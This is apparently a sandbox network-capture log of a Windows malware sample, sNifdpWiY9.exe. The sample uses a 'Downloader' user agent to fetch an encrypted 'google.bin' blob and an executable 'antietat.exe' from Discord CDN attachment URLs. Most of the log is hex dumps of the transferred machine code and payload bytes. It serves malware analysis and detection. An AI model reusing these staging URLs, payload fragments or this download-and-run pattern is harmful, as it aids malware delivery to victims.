2024-12-05 10:41:05 UTC	1369	IN	Data Raw: 00 00 00 00 0f 1f 00 0f b7 54 75 00 4d 89 e8 48 89 f9 e8 00 54 00 00 85 c0 0f 8e 95 00 00 00 83 e8 01 49 89 fe 4c 8d 7c 07 01 eb 18 0f 1f 00 48 63 53 24 88 0c 10 8b 43 24 83 c0 01 89 43 24 4d 39 fe 74 37 8b 53 08 49 83 c6 01 f6 c6 40 75 08 8b 43 24 39 43 28 7e e1 41 0f be 4e ff 48 8b 03 80 e6 20 74 ca 48 89 c2 e8 4a 5a 00 00 8b 43 24 83 c0 01 89 43 24 4d 39 fe 75 c9 48 83 c6 01 44 89 e0 29 f0 85 c0 0f 8f 7b ff ff ff 8b 43 0c 8d 50 ff 89 53 0c 85 c0 7e 28 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 48 89 da b9 20 00 00 00 e8 83 fe ff ff 8b 43 0c 8d 50 ff 89 53 0c 85 c0 7f e6 48 83 c4 48 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 29 f0 89 43 0c f6 43 09 04 75 3a 83 e8 01 89 43 0c 0f 1f 40 00 48 89 da b9 20 00 00 00 e8 43 fe ff ff 8b 43 0c 8d 50 ff 89 53 0c 85 c0 Data Ascii: TuMHTIL\|HcS$C$C$M9t7SI@uC$9C(~ANH tHJZC$C$M9uHD){CPS~(ff.H CPSHH[^_]A\A]A^A_)CCu:C@H CCPS
2024-12-05 10:41:05 UTC	1369	IN	Data Raw: f7 c7 00 40 00 00 75 08 8b 43 24 39 43 28 7e e1 81 e7 00 20 00 00 48 8b 13 74 cb b9 20 00 00 00 e8 39 55 00 00 8b 43 24 83 c0 01 89 43 24 41 83 ed 01 73 c9 48 8d 65 08 5b 5e 5f 41 5c 41 5d 41 5e 41 5f 5d c3 66 0f 1f 84 00 00 00 00 00 66 83 7b 20 00 0f 84 fd fd ff ff b9 04 00 00 00 41 89 c2 41 b9 ab aa aa aa 4d 0f af d1 44 8b 4b 0c 49 c1 ea 21 44 01 d0 44 39 c8 41 0f 4c c1 48 98 48 83 c0 0f 48 83 e0 f0 e8 a2 f7 ff ff 48 29 c4 4c 8d 64 24 20 41 83 fd 6f 0f 85 df fd ff ff e9 e9 00 00 00 0f 1f 00 44 89 c0 80 e4 f7 89 43 08 45 85 f6 0f 8e 26 02 00 00 45 89 f7 4d 63 c7 41 83 ef 01 48 89 f1 ba 30 00 00 00 4d 63 ff 44 89 4d fc e8 d0 54 00 00 4a 8d 74 3e 01 44 8b 4d fc 4c 39 e6 0f 84 d6 00 00 00 48 89 f0 4c 29 e0 89 c2 44 39 c8 0f 8c dd 00 00 00 c7 43 0c ff ff ff Data Ascii: @uC$9C(~ Ht 9UC$C$AsHe[^_A\A]A^A_]ff{ AAMDKI!DD9ALHHHH)Ld$ AoDCE&EMcAH0McDMTJt>DML9HL)D9C
2024-12-05 10:41:05 UTC	1369	IN	Data Raw: 00 00 e8 46 50 00 00 4d 63 ff 4f 8d 6c 3d 01 4d 39 ec 0f 84 e6 00 00 00 85 f6 7e 43 4c 89 e8 4c 29 e0 29 c6 89 73 0c 85 f6 7e 34 f7 c7 c0 01 00 00 74 06 83 ee 01 89 73 0c 45 85 f6 79 12 89 f8 25 00 06 00 00 3d 00 02 00 00 0f 84 00 02 00 00 81 e7 00 04 00 00 0f 84 16 01 00 00 8b 7b 08 40 f6 c7 80 0f 84 ac 01 00 00 41 c6 45 00 2d 49 8d 75 01 49 39 f4 72 2a e9 1a 01 00 00 66 0f 1f 84 00 00 00 00 00 48 63 43 24 88 0c 02 8b 43 24 83 c0 01 89 43 24 49 39 f4 0f 84 f8 00 00 00 8b 7b 08 48 83 ee 01 f7 c7 00 40 00 00 75 08 8b 43 24 39 43 28 7e da 81 e7 00 20 00 00 0f be 0e 48 8b 13 74 c2 e8 3d 4f 00 00 8b 43 24 eb c2 0f 1f 84 00 00 00 00 00 89 c2 41 b8 ab aa aa aa 49 0f af d0 48 c1 ea 21 01 d0 e9 27 fe ff ff 66 0f 1f 84 00 00 00 00 00 4d 39 ec 0f 85 1a ff ff ff 41 Data Ascii: FPMcOl=M9~CLL))s~4tsEy%={@AE-IuI9r*fHcC$C$C$I9{H@uC$9C(~ Ht=OC$AIH!'fM9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	162.159.134.233	443	4900	C:\Users\user\Desktop\sNifdpWiY9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 10:41:06 UTC	500	OUT	GET /attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b& HTTP/1.1 User-Agent: Downloader Host: cdn.discordapp.com Cache-Control: no-cache Cookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A; _cfuvid=bU7nF5VnNYVA.5nawcWS8uqB9Y.KCne1Dnja3l1cffI-1733395264866-0.0.1.1-604800000
2024-12-05 10:41:07 UTC	1298	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 10:41:06 GMT Content-Type: application/octet-stream Content-Length: 210624 Connection: close CF-Ray: 8ed36c0249a18c65-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 9445 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="google.bin" ETag: "3ac321648d8ba5e4085f3aea6304fbba" Expires: Fri, 05 Dec 2025 10:41:06 GMT Last-Modified: Thu, 05 Dec 2024 04:24:00 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1733372640566234 x-goog-hash: crc32c=pCQb3Q== x-goog-hash: md5=OsMhZI2LpeQIXzrqYwT7ug== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 210624 x-guploader-uploadid: AFiumC49cRuhl-V1NKnfqZkYGrjRzu4zovf5xeHYiLwz--tY3BhV9oOWQnLGjuJcB_YGRqg_asphB5hJSQ X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Gp9EFuTfDpp0%2FGat0ZWWycWF9EiW8vC%2F4Jh%2BwVfK1e9jinLWR%2FobMn%2BQR23bCNiEgw8hke8%2FAS8A5eKK8%2FwVugfY2AyOa6BN02MGPDR%2F6vSn6OWsBPz7McdRVCJy0B0nWbFhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare
2024-12-05 10:41:07 UTC	71	IN	Data Raw: 64 a0 e2 3b 4e e7 c2 b0 ee 05 db c2 65 38 b1 f7 e8 61 e3 b7 82 88 1b 6a bb 77 3a 1a 46 1d de 76 7f c4 c3 2c 68 75 ed 17 33 4b 57 26 88 3b 20 d3 1f fc ae 81 6e 74 cb 57 68 26 3f b7 ec f2 d2 1a a2 7e df b2 c8 cf 8a Data Ascii: d;Ne8ajw:Fv,hu3KW&; ntWh&?~
2024-12-05 10:41:07 UTC	1369	IN	Data Raw: 6e 0d 32 c4 b7 6e 3f 3b 60 a0 5a 60 94 b1 06 11 3f d0 9b b2 a7 71 e9 04 af 1c 00 6d a2 a1 d1 87 3b 5d dc 52 ee 46 e2 de 40 61 c0 49 3e 35 06 05 d3 e7 8f ec e2 c8 57 22 7b 9d b2 aa 6f 1e 09 01 42 06 92 2b 9f 1c 91 08 fd 1f 13 27 ae d0 6c 5a aa 18 89 09 97 ef 81 d4 d1 53 3d 40 5a 59 92 65 d1 26 76 08 72 f5 56 a4 77 38 50 75 d6 62 11 06 65 4e 37 f7 d1 e8 23 b7 71 ab d5 94 e5 db 25 31 9f 95 69 a0 3a 86 91 2d a4 f0 55 60 59 ee e8 80 43 d1 02 31 a2 e1 c8 30 c6 b6 9d f3 4a 4a 29 93 6c 50 9a 84 34 fc 35 74 32 27 f2 80 19 64 6e b7 9c 82 56 7a 2f b1 f8 81 64 42 cc 77 85 21 4f 83 20 12 34 1c c2 89 4e a9 7a 35 81 a6 35 df ce 43 73 ab 64 d4 a9 bc c0 f3 3f 08 60 6c 4f db f7 92 09 85 87 0e 7c 93 6b 4d f6 4c 3a 8f 38 7b 02 f0 c5 8d e2 f2 2f 27 a2 4a 7b fb 09 2d 35 e7 6f Data Ascii: n2n?;`Z`?qm;]RF@aI>5W"{oB+'lZS=@ZYe&vrVw8PubeN7#q%1i:-U`YC10JJ)lP45t2'dnVz/dBw!O 4Nz55Csd?`lO\|kML:8{/'J{-5o
2024-12-05 10:41:07 UTC	1369	IN	Data Raw: ba 67 91 20 72 96 ca 69 9f 0b f6 28 82 ce 5f bb 89 1b 2e e2 86 be 54 d6 d3 a6 06 77 2c 63 c2 69 1f 65 cb 5a e6 55 39 36 f4 9f 05 d0 8a ca 79 d6 75 2a 5a 60 f5 4f ee 28 16 05 f8 7d 5d e0 68 26 03 42 54 a4 ce c6 f1 98 0a a7 b7 3e fb f1 68 a6 10 12 d4 40 f2 bf c0 f2 47 2d 7b ba 0b ec af 51 f8 7e fa 47 e9 bf f5 4e 6d c3 40 54 9e 5b 52 51 75 28 3e 6c 98 fa e5 10 00 3e 43 9f 62 42 eb 94 ab 13 2a 3f 2c c7 08 9c 2e 42 9b f4 11 4e 89 63 d5 ff 73 a2 62 98 d3 18 82 c8 c5 ca c2 ca a9 1b 61 d0 56 1d 81 77 a4 2a 09 3f 7e 4f f5 57 45 c8 8d 9e f2 3f 96 1d a8 c1 07 e2 ba 9a ba 2d 4f 86 74 10 fa 24 80 92 33 2f eb 06 0c 6b fa 60 58 e6 30 97 b5 77 16 3b 00 15 b9 ca 78 5f c6 68 8b 9a 66 4f 30 e1 f5 6e 32 8d 21 89 be 97 33 35 8d 78 d9 09 be 4a 60 c3 af cb 97 ac c8 bd a0 8d a7 Data Ascii: g ri(_.Tw,cieZU96yuZ`O(}]h&BT>h@G-{Q~GNm@T[RQu(>l>CbB?,.BNcsbaVw*?~OWE?-Ot$3/k`X0w;x_hfO0n2!35xJ`
2024-12-05 10:41:07 UTC	195	IN	Data Raw: 4c be 0d 44 4d a6 52 cd c2 95 49 6b e6 db bc d1 37 af c8 1b 11 6c 9b 77 1d aa 8e 7c 57 85 2a 72 b8 41 b0 3e 35 25 54 34 8a a1 f5 3f 79 a9 24 13 ff 93 c5 2c d3 99 4e 1c 97 4e e2 48 3b 42 2c e4 a9 0f 9b 28 5b 98 52 77 2a b5 c1 82 3d 71 d5 46 bc 09 1e a5 0f 3f 32 21 8b 1c 3e 7f c6 b4 39 70 5b 12 f8 3c 94 a6 76 e1 63 35 45 08 3a 64 d5 d2 fa a1 21 08 8e 58 1f 8d d4 56 86 dc 20 eb e5 c0 c0 38 f8 d4 a3 fc 29 6f cb d8 43 8f 60 33 be 4b 7e 3b e2 42 b5 b9 39 ea 7a 1f 48 95 3e 42 20 77 25 bd 59 fd 94 2b d5 df 59 1c 27 02 02 8a b3 09 b3 18 ba cb 6b 3e 57 82 bb 58 11 d3 96 46 9c 3d d9 fb 2a Data Ascii: LDMRIk7lw\|WrA>5%T4?y$,NNH;B,([Rw=qF?2!>9p[<vc5E:d!XV 8)oC`3K~;B9zH>B w%Y+Y'k>WXF=*
2024-12-05 10:41:07 UTC	1369	IN	Data Raw: f3 34 64 1a 1e ef 38 44 92 95 de 6f 7f 71 cf da 4d 9d 07 d4 2e 03 37 9e f5 2e b9 a6 37 cf e3 40 21 4e 5e 63 a5 8b 8f eb af aa 75 a4 96 d7 52 22 20 85 58 b6 06 46 7c 31 3c d2 a0 fe ab 3f 43 80 de c1 f2 3d e7 01 2f ca 80 d6 14 e9 e9 3a 23 a2 45 8a b7 fe ca 23 da 7e a0 58 23 aa 1c fe 41 1e ef 8d f7 c7 71 2d 20 53 5b 03 96 ae 73 2e 24 64 2e 34 3e f6 73 f8 7d bb 78 ae 6c e6 87 a1 2c 1f b4 5a 7d 18 98 5e da d2 1a 0c c2 cd 85 66 71 63 70 df c9 3c 2c 32 6a f5 17 8c 30 f6 8d 81 4c e1 e7 fa 2f cf ea 4b a0 69 f0 da 41 06 bc 6e eb 7f 11 02 b9 82 07 8d 8b 94 63 bd f7 50 56 aa ee 58 0c fe 43 4f f3 a9 b8 b6 32 cc 0f b7 74 96 24 cc 62 e7 0c e5 8d 12 c0 16 ae 73 cc 14 a9 30 12 d1 b9 d6 99 6c b5 62 ff 7c 88 a3 dd a7 c4 6e 64 05 3e 73 78 5b 25 96 aa e8 e2 a1 13 63 d7 e4 7d Data Ascii: 4d8DoqM.7.7@!N^cuR" XF\|1<?C=/:#E#~X#Aq- S[s.$d.4>s}xl,Z}^fqcp<,2j0L/KiAncPVXCO2t$bs0lb\|nd>sx[%c}
2024-12-05 10:41:07 UTC	1369	IN	Data Raw: 18 b2 c1 89 0d db 7e c7 1f 33 ff bb 40 15 bd 48 b7 7b a2 11 f6 15 6b e7 ba 0a c7 11 61 7e b7 88 63 c2 56 fc e8 1a 5f 2d 8b f5 77 e7 52 2b 9c 4e e1 c3 22 2c 15 db 07 14 48 62 8f 37 c4 f3 ab 46 29 27 03 a6 74 e3 72 48 94 1a 41 30 24 ac 31 d4 a1 e0 1f e6 35 31 06 f5 c2 2d b0 94 00 07 af b9 ce c4 2d ee 9a 5b 72 db 54 98 5d bd 1b c4 82 5b 2f d5 7a 11 73 b7 21 bb 76 00 95 2a da 2c 1e 99 80 05 4e e7 45 57 e7 7f e0 ce a8 a4 d2 fb 7b 6d 95 68 44 2b 88 04 fe 76 3b 55 52 63 5c 7f b5 66 99 d5 f9 d5 5f 9c 88 08 c1 fb 1b 87 ee af 8a c2 7d a5 a7 aa 9a aa e0 49 70 ec e0 be b1 ce cf 97 3e ca 02 ee e3 d7 e3 d1 64 49 08 a7 c0 a2 01 23 5e 50 15 6d 33 9f ef ce 2c 98 08 61 f1 8b 95 fc 4c f9 24 8c 36 5c 1f 35 9f 6d ff 07 e1 87 90 4d c7 84 e0 71 c3 2a d6 5d 52 40 c6 72 08 83 0e Data Ascii: ~3@H{ka~cV_-wR+N",Hb7F)'trHA0$151--[rT][/zs!v,NEW{mhD+v;URc\f_}Ip>dI#^Pm3,aL$6\5mMq]R@r
2024-12-05 10:41:07 UTC	1369	IN	Data Raw: 13 1f 95 c9 11 39 24 d8 47 ce c2 63 da c9 a4 21 95 71 79 29 e7 8d e8 9e 26 2d e0 31 e1 16 83 a5 26 ca 3a 15 11 6a 11 ff d3 9b c9 63 3b 0b 0a 7e a3 a8 27 e8 8e 66 71 5c d3 06 a7 19 e0 42 ee 34 cd 63 31 06 0d 7f e1 7d 20 84 a7 3b 58 ef c5 a7 ec 01 82 9c c1 93 3b ff 22 aa 2e d7 62 54 3e 43 1e fe 8d be 38 cb dc 82 b4 c2 0b dd a4 36 14 6f 59 ec fa e7 0c ea 37 be 25 bb 4c 2e d4 ff 30 fa 16 71 b2 c4 96 fa 82 00 85 e7 3b 59 ad dc 77 75 30 63 ef 95 db 38 05 ed b8 c4 31 15 d2 00 ce b4 b7 1c 28 a7 08 8a d2 2e f4 ac 9d 4d 8d f6 ab 83 57 7d 9a 93 5a 7c 39 08 51 9c df 17 16 41 ad b7 e6 eb b4 19 50 d9 09 2b 59 61 29 29 07 95 22 eb 40 77 a8 da 10 c8 5c a9 59 0b e6 7d 24 76 c1 6b ff 02 1a 2b c7 a4 95 80 2b cc b7 97 0f 97 f6 0a 99 af 0f 01 0c 4a 7b 10 37 68 51 03 0d ce 60 Data Ascii: 9$Gc!qy)&-1&:jc;~'fq\B4c1} ;X;".bT>C86oY7%L.0q;Ywu0c81(.MW}Z\|9QAP+Ya))"@w\Y}$vk++J{7hQ`
2024-12-05 10:41:07 UTC	1369	IN	Data Raw: ef 5f b1 81 d4 7f 67 d7 31 eb 9d 02 56 28 f4 a6 c4 af fd 95 1f e1 10 f7 55 ab 63 cc c2 e6 61 80 10 f9 fc 3b 17 1a a8 f1 73 c4 cc dc 76 6e 8c 74 45 08 3b a3 bc 14 cb 84 9c 24 a1 58 53 2e 48 03 50 e1 a3 95 73 ac 57 0f 9e fa 54 56 56 60 46 43 b2 de 26 51 91 d6 95 73 75 f9 af e8 01 b2 ae cc bd 99 09 1b a3 a0 fa 58 cb 01 8e c1 b1 8f 02 52 88 36 cb 20 7b d6 92 32 ad 0d ee 2a 95 89 9e 11 92 bf f9 de 87 a0 e6 5e e7 0b 3f f3 ba 49 2b 57 36 08 38 be 09 2c 2b e2 5f aa 34 f4 09 8f ac 36 e6 8b 28 42 77 f3 1c 28 6b 98 5f a5 96 72 9d 16 42 b5 5f 0c d7 de 84 29 17 2d 91 ad ba 1e 7c d8 dc 4f 79 df 1a 0d ab bd 57 3b f2 51 63 26 a3 d6 fb 91 ef ed f1 b6 f9 13 39 8f cd c8 74 01 ec af 57 2c 51 42 a6 dc 22 61 81 7c bf d1 81 91 15 bd 2b f9 b8 bd a1 19 dc 50 9a 61 57 2e 98 bd 20 Data Ascii: _g1V(Uca;svntE;$XS.HPsWTVV`FC&QsuXR6 {2*^?I+W68,+_46(Bw(k_rB_)-\|OyW;Qc&9tW,QB"a\|+PaW.
2024-12-05 10:41:07 UTC	1369	IN	Data Raw: 3c 4a 5a 6d 1c b6 e8 28 32 b5 e2 29 dd 10 ea ab 10 38 7b 6b c8 ac 46 56 e6 32 b1 a5 4f 24 07 0c af dc a4 64 c1 11 48 80 7f 19 d4 ba a3 83 4b f7 07 9c a0 80 8c 4c b2 b7 05 c1 3e 2f 43 8b d2 02 5e 35 ff fb 1d 4c c5 c8 f4 a4 c4 35 f3 ca ea 16 be 92 f3 53 51 76 79 45 ed fb 82 22 f2 ea 1b 1e 87 5a 20 5e dd ef b6 7e 7e 46 35 95 f7 9b aa 99 b9 56 d9 2a 5f 82 cf 5e 3a 1e dc c6 75 4c ee c1 ed bd df bf 75 64 64 e0 95 99 0b 94 b9 3d 37 d2 6e d9 37 97 40 4d e0 99 96 8c 3d 36 ec 9c 87 b8 ed 8d 09 ba 5c 41 26 f4 47 78 55 2e cb 98 e1 34 69 9a e6 ee d9 16 9a 60 e9 07 52 82 27 a7 0d b2 b1 6d d6 2d aa a8 a4 44 e4 76 d6 5b de 19 fa b5 69 7f be 11 87 aa 9f 57 19 b9 9a c9 82 1c 85 a7 35 22 90 d9 85 a1 ff 89 8f dd 2d 20 db 57 e9 b8 6e 99 67 a7 c4 78 3c b4 13 ef a8 da 72 27 83 Data Ascii: <JZm(2)8{kFV2O$dHKL>/C^5L5SQvyE"Z ^~~F5V*_^:uLudd=7n7@M=6\A&GxU.4i`R'm-Dv[iW5"- Wngx<r'
2024-12-05 10:41:07 UTC	1369	IN	Data Raw: 49 0b db 19 46 d5 0f 7b d3 8a 54 52 89 f1 10 fd e4 4c 9d 83 7e 05 ea 92 61 23 68 77 0b 1d 42 3e f3 2e 71 98 b3 22 b2 d5 7e 80 67 12 23 9f e9 f1 a9 54 ed ca af b2 80 80 33 02 61 ca f2 4e 4d 4e b1 ac 5f d3 3d 55 5b 19 9a be 7d e3 b8 46 07 9d dc 48 59 7f 76 f1 d4 ed 8c 86 02 d8 1d e0 c5 40 14 9f 4e 6e b5 55 ba 21 73 37 60 cc 5f 9a b5 8c 6c dd 26 31 90 b0 41 ca a0 e9 d8 64 44 59 0e e1 61 da 1d 19 ee 75 8b 0d 5c 30 83 35 d8 e7 7d 2e 85 86 8a b6 68 14 e2 97 78 56 ec c6 25 32 9a 94 0d 34 da 90 bf 1b dc ff d7 27 fa b9 99 14 7b 12 91 c0 c9 b6 31 b8 ca fc c4 5f 17 16 e9 c4 91 09 6b 92 ca 4a 9f b3 de 13 f7 97 ae 48 39 1b a6 b8 3e 6f ae db d3 95 50 3a a6 a9 d6 f9 79 bb 7e 6e 45 53 41 5a 7b 0d b0 62 ce a1 10 39 1c 56 3e 33 7c b9 aa e1 b2 ee 45 8f 5b ac 66 01 4f e8 0a Data Ascii: IF{TRL~a#hwB>.q"~g#T3aNMN_=U[}FHYv@NnU!s7`_l&1AdDYau\05}.hxV%24'{1_kJH9>oP:y~nESAZ{b9V>3\|E[fO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49709	162.159.134.233	443	3808	C:\Users\user\Desktop\sNifdpWiY9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 10:41:17 UTC	417	OUT	GET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1 User-Agent: Downloader Host: cdn.discordapp.com Cache-Control: no-cache Cookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A
2024-12-05 10:41:18 UTC	1265	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 10:41:18 GMT Content-Type: application/x-msdos-program Content-Length: 46592 Connection: close CF-Ray: 8ed36c47b8cb42e7-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 13438 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="antietat.exe" ETag: "2eddba95f5818ef402bfe7fbaa0f6a18" Expires: Fri, 05 Dec 2025 10:41:18 GMT Last-Modified: Thu, 05 Dec 2024 05:13:43 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1733375623321737 x-goog-hash: crc32c=C+Z3jw== x-goog-hash: md5=Lt26lfWBjvQCv+f7qg9qGA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 46592 x-guploader-uploadid: AFiumC5KewGqCdjqrDiVmKhof3L_YhJd69mxK8gUrus2hdwbkNR2Kd9X2RkSjYVGnr87jIWq51Q X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSnTPGcvCWWWy5ga75CpCLNnVQg9oTJGeFhIiD7O1vkUpfmoz%2BfDG4KbO1dxdXc2l4%2BLBC5d%2BRu85KOfJag7zkiN7FoWi5ptitqoVm%2FheFc700nsbboUBbOWDanHhz3H3H6e7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
2024-12-05 10:41:18 UTC	184	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 69 73 61 34 78 31 49 45 37 78 64 6a 54 55 4d 5a 72 67 30 39 47 30 7a 2e 35 39 58 49 4c 53 48 68 41 46 72 4b 36 4e 77 79 32 58 63 2d 31 37 33 33 33 39 35 32 37 38 30 37 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=isa4x1IE7xdjTUMZrg09G0z.59XILSHhAFrK6Nwy2Xc-1733395278077-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
2024-12-05 10:41:18 UTC	1289	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 04 fb 50 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 7a 00 00 00 b2 00 00 00 0c 00 00 e0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 40 01 00 00 04 00 00 e1 cf 00 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdPg.+z@@`
2024-12-05 10:41:18 UTC	1369	IN	Data Raw: 28 c3 0f 1f 44 00 00 83 78 74 0e 0f 86 40 ff ff ff 44 8b 80 e8 00 00 00 31 c9 45 85 c0 0f 95 c1 e9 2c ff ff ff 66 90 48 83 ec 38 48 8b 05 b5 9a 00 00 4c 8d 05 d6 ce 00 00 48 8d 15 d7 ce 00 00 48 8d 0d d8 ce 00 00 8b 00 89 05 ac ce 00 00 48 8b 05 51 9a 00 00 44 8b 08 48 8d 05 9b ce 00 00 48 89 44 24 20 e8 75 73 00 00 90 48 83 c4 38 c3 0f 1f 80 00 00 00 00 41 54 55 57 56 53 48 83 ec 20 b8 30 00 00 00 65 67 48 8b 00 48 8b 70 08 48 8b 1d 91 99 00 00 48 8b 3d 3a e1 00 00 eb 18 0f 1f 84 00 00 00 00 00 48 39 c6 0f 84 5f 01 00 00 b9 e8 03 00 00 ff d7 31 c0 f0 48 0f b1 33 75 e7 31 ff 48 8b 35 6e 99 00 00 8b 06 83 f8 01 0f 84 ca 01 00 00 8b 06 85 c0 0f 84 69 01 00 00 c7 05 17 ce 00 00 01 00 00 00 8b 06 83 f8 01 0f 84 78 01 00 00 85 ff 0f 84 3c 01 00 00 48 8b 05 95 Data Ascii: (Dxt@D1E,fH8HLHHHQDHHD$ usH8ATUWVSH 0egHHpHH=:H9_1H3u1H5nix<H
2024-12-05 10:41:18 UTC	1369	IN	Data Raw: 00 00 48 63 7e 3c 48 01 f7 81 3f 50 45 00 00 0f 85 bb 00 00 00 8b 57 50 41 b9 40 00 00 00 41 b8 00 30 00 00 31 c9 ff 15 62 dc 00 00 48 89 c5 48 85 c0 0f 84 b9 00 00 00 44 8b 47 54 48 89 f2 48 89 c1 45 31 e4 e8 04 6f 00 00 48 63 46 3c 66 83 7f 06 00 48 8d 9c 06 14 01 00 00 74 26 90 8b 0b 8b 53 08 41 83 c4 01 48 83 c3 28 44 8b 43 dc 48 01 e9 48 01 f2 e8 d4 6e 00 00 0f b7 47 06 44 39 e0 7f db 48 8d 0d ec 8a 00 00 e8 8f 11 00 00 8b 5f 28 48 8d 0d 0d 8b 00 00 48 01 eb 48 89 da e8 7a 11 00 00 48 8d 0d 2b 8b 00 00 e8 6e 11 00 00 ff d3 41 b8 00 80 00 00 31 d2 48 89 e9 ff 15 d3 db 00 00 31 c0 48 83 c4 20 5b 5e 5f 5d 41 5c c3 48 8d 0d 3f 8a 00 00 e8 42 11 00 00 b8 ff ff ff ff eb e2 48 8d 0d 04 8a 00 00 e8 2f 11 00 00 eb eb ff 15 57 db 00 00 48 8d 0d 38 8a 00 00 89 Data Ascii: Hc~<H?PEWPA@A01bHHDGTHHE1oHcF<fHt&SAH(DCHHnGD9H_(HHHzH+nA1H1H [^_]A\H?BH/WH8
2024-12-05 10:41:18 UTC	1369	IN	Data Raw: d6 00 00 48 8d 0d d3 89 00 00 89 c2 e8 64 fe ff ff 0f 1f 40 00 31 f6 e9 21 ff ff ff 48 8b 05 ca c4 00 00 8b 57 08 48 8d 0d 78 89 00 00 4c 8b 44 18 18 e8 3e fe ff ff 48 89 da 48 8d 0d 44 89 00 00 e8 2f fe ff ff 90 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 55 41 57 41 56 41 55 41 54 57 56 53 48 83 ec 48 48 8d 6c 24 40 44 8b 25 74 c4 00 00 45 85 e4 74 17 48 8d 65 08 5b 5e 5f 41 5c 41 5d 41 5e 41 5f 5d c3 66 0f 1f 44 00 00 c7 05 4e c4 00 00 01 00 00 00 e8 89 09 00 00 48 98 48 8d 04 80 48 8d 04 c5 0f 00 00 00 48 83 e0 f0 e8 d2 0b 00 00 4c 8b 2d 0b 8e 00 00 48 8b 1d 14 8e 00 00 48 29 c4 c7 05 1b c4 00 00 00 00 00 00 48 8d 44 24 30 48 89 05 13 c4 00 00 4c 89 e8 48 29 d8 48 83 f8 07 7e 90 48 83 f8 0b 0f 8f 5d 01 00 00 8b 03 85 c0 0f 85 5b 02 00 00 8b 43 04 85 c0 Data Ascii: Hd@1!HWHxLD>HHD/ff.UAWAVAUATWVSHHHl$@D%tEtHe[^_A\A]A^A_]fDNHHHHL-HH)HD$0HLH)H~H][C
